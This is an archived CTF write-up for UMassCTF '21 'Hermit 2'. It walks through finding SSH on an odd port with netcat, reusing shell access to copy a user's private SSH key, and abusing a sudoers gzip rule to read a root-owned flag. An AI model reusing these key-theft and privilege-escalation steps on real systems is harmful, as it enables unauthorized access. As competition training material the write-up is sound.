💾 Archived View for g.codelearn.me › 2021-03-28-umassctf-hermit2-writeup.gmi captured on 2024-07-08 at 23:58:53. Gemini links have been rewritten to link to archived content

View Raw

More Information

⬅️ Previous capture (2023-01-29)

-=-=-=-=-=-=-

UMassCTF '21 Hermit 2 WriteUp

Solution

The image above is what we see when visiting the challenge URL (`104.197.195.221:8087`)

That's strange. Initially I thought the site is down but it's fine.

Let's try to connect with NetCat and see what the server tell us and why browser can't display it.

`nc -vvv 104.197.195.221 8087`

and response we get back is:

221.195.197.104.bc.googleusercontent.com [104.197.195.221] 8087 (?) open
SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2

Doesn't look like valid HTTP resopnse lol. Ok now we know that SSH server is running on that port so let's try to connect.

`ssh 104.197.195.221 -p 8087` - and we see the prompt to enter a password for myself (krydos). It isn't clear what user should I use. And even if we know the user what is the password?

As a hint the challenge name is `hermit` so the user is probably has the same name but we still need to know password.

Poking around, trying different things I noticed that hermit 2 challenge is on the same IP address where hermit 1 is.

That's actually great because we have shell access on the server from the previous challenge.

So I went to `/home/hermit/.ssh` folder, copied user's private key and used it in my ssh command like this:

`ssh -i /tmp/hermit.ssh.private.key hermit@104.197.195.221 -p 8087`

We're in. Now... where is the flag? We know one flag from the previous challenge but I wasn't able to find another one.

Grep'ing everything didn't help. My assumption was that the flag is somewhere in `/root` folder or somewhere else where hermit user doesn't have access to.

Now... how can I become a root? Tried some stuff but didn't find anything useful.

Then I grepped for `flag` in `/etc` folder and I found

`hermit ALL = (root) NOPASSWD: /bin/gzip -f /root/rootflag.txt -t` in `/etc/sudoers` file.

This record means that we can execute that command without asking for password.

Let's do it:

`sudo /bin/gzip -f /root/rootflag.txt -t` and we see the flag - `UMASS{a_test_of_integrity}`

Hooray